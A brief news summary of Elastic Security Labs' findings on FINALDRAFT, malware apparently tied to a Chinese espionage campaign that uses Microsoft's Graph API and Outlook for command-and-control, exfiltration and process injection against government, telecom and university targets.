Elastic Security Labs uncovered FINALDRAFT, a malware utilizing Microsoft's Graph API for data exfiltration and process injection, tied to a potential Chinese espionage campaign. Initially targeting the foreign ministry of a South American country, along with a telecommunications firm and a university in Southeast Asia, the campaign showcases intricate malware behavior like C2 via Outlook. Despite its advanced nature, researchers noted operational inconsistencies, indicating that attackers may lack extensive experience despite effective organizational structure. The infection process leverages tools such as certutil and manipulates memory injection to evade detection, reflecting evolving cyber-attack methodologies.
The FINALDRAFT malware utilizes Microsoft's Graph API to exfiltrate data and perform process injection, indicating a sophisticated espionage campaign possibly linked to China.
Elastic Security Labs discovered FINALDRAFT during an investigation, revealing its extensive functionality—operating via Outlook for command-and-control communications.
While the malware demonstrates high sophistication, inconsistencies in the evasion techniques hint at a less experienced attacker group that may be well-organized.
The FINALDRAFT malware targets key institutions, including a foreign ministry and a university, showcasing a trend in cyber espionage against strategic sectors.
Collection
[
|
...
]